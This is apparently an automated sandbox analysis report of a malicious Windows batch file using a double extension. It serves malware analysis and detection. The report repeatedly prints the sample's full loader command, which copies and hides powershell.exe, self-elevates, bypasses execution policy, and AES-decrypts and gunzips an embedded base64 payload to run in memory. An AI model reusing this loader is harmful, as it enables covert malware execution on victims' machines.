Create Interactive Tour

Windows Analysis Report
new_7.txt.bat

Overview

General Information

Sample Name:	new_7.txt.bat
Analysis ID:	722277
MD5:	015ab34ae838120d78786301759920b2
SHA1:	81040c2858d637e00c690abc41b083b69dfa9595
SHA256:	0e726ad2eea01946be18df7ef4f207f6dfb7fcc77d20ddd49ddf7a6771356434
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Uses cmd line tools excessively to alter registry or file data

Uses an obfuscated file name to hide its real file extension (double extension)

Suspicious powershell command line found

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Sample file is different than original file name gathered from version info

Drops PE files

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Creates a process in suspended mode (likely to inject code)

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6068 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new_7.txt.bat" " MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 3672 cmdline: powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\user\Desktop\new_7.txt.bat"' -ArgumentList 'am_admin'" MD5: 95000560239032BC68B4C2FDFCDEF913)

cmd.exe (PID: 1236 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\new_7.txt.bat" am_admin MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4860 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo F" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

xcopy.exe (PID: 5332 cmdline: xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new_7.txt.bat.exe /y MD5: 6BC7DB1465BEB7607CBCBD7F64007219)

attrib.exe (PID: 3000 cmdline: attrib +s +h new_7.txt.bat.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)

new_7.txt.bat.exe (PID: 5216 cmdline: new_7.txt.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $GErDCs = [System.IO.File]::ReadAllText('C:\Users\user\Desktop\new_7.txt.bat').Split([Environment]::NewLine);$wnrxWS = $GErDCs[$GErDCs.Length - 1];$TNzJht = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('using System.Text;using System.IO;using System.IO.Compression;using System.Security.Cryptography; public class HBjTWL { public static byte[] apTBPb(byte[] input, byte[] key, byte[] iv) { AesManaged aes = new AesManaged(); aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.PKCS7; ICryptoTransform decryptor = aes.CreateDecryptor(key, iv); byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length); decryptor.Dispose(); aes.Dispose(); return decrypted; } public static byte[] xLdugB(byte[] bytes) { MemoryStream msi = new MemoryStream(bytes); MemoryStream mso = new MemoryStream(); var gs = new GZipStream(msi, CompressionMode.Decompress); gs.CopyTo(mso); gs.Dispose(); msi.Dispose(); mso.Dispose(); return mso.ToArray(); } }'));Add-Type -TypeDefinition $TNzJht;[System.Reflection.Assembly]::Load([HBjTWL]::xLdugB([HBjTWL]::apTBPb([System.Convert]::FromBase64String($wnrxWS), [System.Convert]::FromBase64String('MjRhIG1Y63akCBVDPHdI4uJaXGMCeTuk1uW/CtYuSZU='), [System.Convert]::FromBase64String('o0lNLh6cZrdnCdGsa1aPww==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin'))) MD5: 95000560239032BC68B4C2FDFCDEF913)

attrib.exe (PID: 1900 cmdline: attrib -s -h new_7.txt.bat.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: new_7.txt.bat.exe PID: 5216	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x5bcb4:$b2: ::FromBase64String( 0x5c027:$b2: ::FromBase64String( 0x5c054:$b2: ::FromBase64String( 0x5c0a8:$b2: ::FromBase64String( 0xffe6d:$b2: ::FromBase64String( 0x100158:$b2: ::FromBase64String( 0x100186:$b2: ::FromBase64String( 0x1001db:$b2: ::FromBase64String( 0x100368:$b2: ::FromBase64String( 0x1006db:$b2: ::FromBase64String( 0x100708:$b2: ::FromBase64String( 0x10075c:$b2: ::FromBase64String( 0x100e81:$b2: ::FromBase64String( 0x1011f4:$b2: ::FromBase64String( 0x101221:$b2: ::FromBase64String( 0x101275:$b2: ::FromBase64String( 0x10143e:$b2: ::FromBase64String( 0x1017b1:$b2: ::FromBase64String( 0x1017de:$b2: ::FromBase64String( 0x101832:$b2: ::FromBase64String( 0x101aa4:$b2: ::FromBase64String(

Joe Sandbox Signatures

• Compliance
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• Anti Debugging
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

Source:	Binary string: System.Management.Automation.pdb source: new_7.txt.bat.exe, 00000008.00000002.347817793.0000022EAC010000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: new_7.txt.bat.exe, 00000008.00000002.347817793.0000022EAC010000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb_ source: new_7.txt.bat.exe, 00000008.00000002.347817793.0000022EAC010000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ib.pdb source: new_7.txt.bat.exe, 00000008.00000002.347451106.0000022EABDFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: new_7.txt.bat.exe, 00000008.00000000.312453402.00007FF7D81CA000.00000002.00000001.01000000.00000003.sdmp, new_7.txt.bat.exe.6.dr
Source:	Binary string: re.pdb< source: new_7.txt.bat.exe, 00000008.00000002.347451106.0000022EABDFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: new_7.txt.bat.exe, 00000008.00000000.312453402.00007FF7D81CA000.00000002.00000001.01000000.00000003.sdmp, new_7.txt.bat.exe.6.dr

Source: new_7.txt.bat.exe, 00000008.00000002.347284273.0000022EABDC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: new_7.txt.bat.exe, 00000008.00000002.347158292.0000022EABD70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: new_7.txt.bat.exe, 00000008.00000002.345458231.0000022EA3E1A000.00000004.00000800.00020000.00000000.sdmp, new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: new_7.txt.bat.exe, 00000008.00000002.327410941.0000022E93E6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: new_7.txt.bat.exe, 00000008.00000002.326465249.0000022E93C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: new_7.txt.bat.exe, 00000008.00000002.327410941.0000022E93E6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: new_7.txt.bat.exe, 00000008.00000002.327410941.0000022E93E6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: new_7.txt.bat.exe, 00000008.00000002.341986393.0000022E95088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: new_7.txt.bat.exe, 00000008.00000002.345458231.0000022EA3E1A000.00000004.00000800.00020000.00000000.sdmp, new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: new_7.txt.bat.exe PID: 5216, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Source: Process Memory Space: new_7.txt.bat.exe PID: 5216, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: new_7.txt.bat.exe, 00000008.00000002.326602121.0000022E93CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs new_7.txt.bat
Source: new_7.txt.bat.exe, 00000008.00000002.325960870.0000022E91EA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs new_7.txt.bat
Source: new_7.txt.bat.exe, 00000008.00000002.326465249.0000022E93C61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs new_7.txt.bat
Source: new_7.txt.bat.exe, 00000008.00000000.312505197.00007FF7D8228000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs new_7.txt.bat
Source: new_7.txt.bat.exe.6.dr	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs new_7.txt.bat

Source: C:\Users\user\Desktop\new_7.txt.bat.exe

File read: C:\Users\user\Desktop\new_7.txt.bat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new_7.txt.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\user\Desktop\new_7.txt.bat"' -ArgumentList 'am_admin'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\new_7.txt.bat" am_admin
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new_7.txt.bat.exe /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h new_7.txt.bat.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\new_7.txt.bat.exe new_7.txt.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $GErDCs = [System.IO.File]::ReadAllText('C:\Users\user\Desktop\new_7.txt.bat').Split([Environment]::NewLine);$wnrxWS = $GErDCs[$GErDCs.Length - 1];$TNzJht = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('using System.Text;using System.IO;using System.IO.Compression;using System.Security.Cryptography; public class HBjTWL { public static byte[] apTBPb(byte[] input, byte[] key, byte[] iv) { AesManaged aes = new AesManaged(); aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.PKCS7; ICryptoTransform decryptor = aes.CreateDecryptor(key, iv); byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length); decryptor.Dispose(); aes.Dispose(); return decrypted; } public static byte[] xLdugB(byte[] bytes) { MemoryStream msi = new MemoryStream(bytes); MemoryStream mso = new MemoryStream(); var gs = new GZipStream(msi, CompressionMode.Decompress); gs.CopyTo(mso); gs.Dispose(); msi.Dispose(); mso.Dispose(); return mso.ToArray(); } }'));Add-Type -TypeDefinition $TNzJht;[System.Reflection.Assembly]::Load([HBjTWL]::xLdugB([HBjTWL]::apTBPb([System.Convert]::FromBase64String($wnrxWS), [System.Convert]::FromBase64String('MjRhIG1Y63akCBVDPHdI4uJaXGMCeTuk1uW/CtYuSZU='), [System.Convert]::FromBase64String('o0lNLh6cZrdnCdGsa1aPww==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -s -h new_7.txt.bat.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\user\Desktop\new_7.txt.bat"' -ArgumentList 'am_admin'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\new_7.txt.bat" am_admin	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new_7.txt.bat.exe /y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h new_7.txt.bat.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\new_7.txt.bat.exe new_7.txt.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $GErDCs = [System.IO.File]::ReadAllText('C:\Users\user\Desktop\new_7.txt.bat').Split([Environment]::NewLine);$wnrxWS = $GErDCs[$GErDCs.Length - 1];$TNzJht = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('using System.Text;using System.IO;using System.IO.Compression;using System.Security.Cryptography; public class HBjTWL { public static byte[] apTBPb(byte[] input, byte[] key, byte[] iv) { AesManaged aes = new AesManaged(); aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.PKCS7; ICryptoTransform decryptor = aes.CreateDecryptor(key, iv); byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length); decryptor.Dispose(); aes.Dispose(); return decrypted; } public static byte[] xLdugB(byte[] bytes) { MemoryStream msi = new MemoryStream(bytes); MemoryStream mso = new MemoryStream(); var gs = new GZipStream(msi, CompressionMode.Decompress); gs.CopyTo(mso); gs.Dispose(); msi.Dispose(); mso.Dispose(); return mso.ToArray(); } }'));Add-Type -TypeDefinition $TNzJht;[System.Reflection.Assembly]::Load([HBjTWL]::xLdugB([HBjTWL]::apTBPb([System.Convert]::FromBase64String($wnrxWS), [System.Convert]::FromBase64String('MjRhIG1Y63akCBVDPHdI4uJaXGMCeTuk1uW/CtYuSZU='), [System.Convert]::FromBase64String('o0lNLh6cZrdnCdGsa1aPww==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -s -h new_7.txt.bat.exe	Jump to behavior

Source: C:\Users\user\Desktop\new_7.txt.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_01

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\Desktop\new_7.txt.bat.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0t53sw2.il2.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new_7.txt.bat" "

Source: classification engine

Classification label: mal60.evad.winBAT@17/7@0/0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: new_7.txt.bat.exe, 00000008.00000002.347817793.0000022EAC010000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: new_7.txt.bat.exe, 00000008.00000002.347817793.0000022EAC010000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb_ source: new_7.txt.bat.exe, 00000008.00000002.347817793.0000022EAC010000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ib.pdb source: new_7.txt.bat.exe, 00000008.00000002.347451106.0000022EABDFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: new_7.txt.bat.exe, 00000008.00000000.312453402.00007FF7D81CA000.00000002.00000001.01000000.00000003.sdmp, new_7.txt.bat.exe.6.dr
Source:	Binary string: re.pdb< source: new_7.txt.bat.exe, 00000008.00000002.347451106.0000022EABDFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: new_7.txt.bat.exe, 00000008.00000000.312453402.00007FF7D81CA000.00000002.00000001.01000000.00000003.sdmp, new_7.txt.bat.exe.6.dr

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\user\Desktop\new_7.txt.bat"' -ArgumentList 'am_admin'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\user\Desktop\new_7.txt.bat"' -ArgumentList 'am_admin'"			Jump to behavior

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe	Jump to behavior

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\Desktop\new_7.txt.bat.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: txt.bat

Static PE information: new_7.txt.bat

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
